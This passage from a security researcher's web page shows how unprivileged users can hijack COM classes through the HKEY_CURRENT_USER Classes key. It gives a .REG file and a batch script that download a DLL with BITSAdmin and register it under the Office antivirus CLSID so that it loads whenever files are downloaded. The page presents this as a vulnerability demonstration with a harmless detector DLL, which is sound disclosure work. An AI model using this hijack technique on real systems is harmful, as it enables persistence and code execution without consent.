Windows Vista and newer versions of Windows are shipped as (pre-built) generalised system images, designed to run from a single hard disk partition with the drive letter C assigned. All directories and files contained within these system images have fixed, language-independent (path)names and can neither be relocated nor renamed: see the MSKB articles 949977 and 2787623 for some details. Additionally the vast majority of files are (nowadays) registered with their absolute (fully qualified) pathname containing the (fixed) drive letter and the language-independent directory name, which renders their change or relocation practically impossible.

The use of environment variables within pathnames serves no (good) purpose, it is not just deprecated and superfluous, but outright dangerous, allowing attacks like those shown above in the first place, and must therefore be avoided and banned!

Case 3

Windows 2000 introduced the merged view of the HKEY_CLASSES_ROOT virtual Registry tree.

Thanks to this feature, COM classes and interfaces registered by (unprivileged) users below the user’s HKEY_CURRENT_USER\Software\Classes Registry key obscure the corresponding COM classes and interfaces registered (by administrators) below the machine’s HKEY_LOCAL_MACHINE\SOFTWARE\Classes Registry key.

Note: the resulting well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Demonstration

On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following 6 simple steps (adaption for 64-bit installations is left as an exercise to the reader).
  1. Log on to an arbitrary (unprivileged) user account.

  2. Download the SENTINEL.DLL of the Vulnerability and Exploit Detector and save it in an arbitrary directory.

  3. Create a text file SENTINEL.REG with the following contents:

    REGEDIT4
    
    ; Copyright © 2004-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
    @="Vulnerability and Exploit Detector"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="MSOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
    ; NOTE: replace ‹path› with the directory used in step 2.
    @="‹path›\\SENTINEL.DLL"
    "ThreadingModel"="Both"
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
    @="{2781761E-28E0-4109-99FE-B9D127C57AFE}"
    
    ; NOTE: the following entries are optional and can be omitted!
    
    [HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="IOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
    @="IOfficeAntiVirus"
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
    @="{00000000-0000-0000-C000-000000000046}" ; IUnknown
    
    [HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
    @="4"
  4. Double-click the file SENTINEL.REG created in the previous step 3. to merge it into the user’s Registry.

  5. Run the following command line to verify the proper registration of the COM class:

    RUNDLL32.EXE /STA {2781761E-28E0-4109-99FE-B9D127C57AFE}
  6. Download an arbitrary (portable executable) file with your WWW browser, for example SENTINEL.EXE, or save an attachment in your mail client, and notice the message boxes displayed from the SENTINEL.DLL downloaded in step 2.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows.
Rem Copyright © 2004-2020, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER IOAV /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

Start https://skanthak.homepage.t-online.de/download/SENTINEL.EXE

If "%PROCESSOR_ARCHITECTURE%" == "AMD64" Goto :AMD64
If "%PROCESSOR_ARCHITEW6432%" == "AMD64" Goto :WOW6432
If "%PROCESSOR_ARCHITECTURE%" == "x86" Goto :I386
Exit /B

:AMD64
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Goto :COMMON

:WOW6432
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramW6432%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB

:I386
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

:COMMON
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Start https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
Start "IOAV" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Exit /B

Mitigation

Software Restrictions Policies or AppLocker

Contact

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):


Copyright © 1995–2020 • Stefan Kanthak • <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>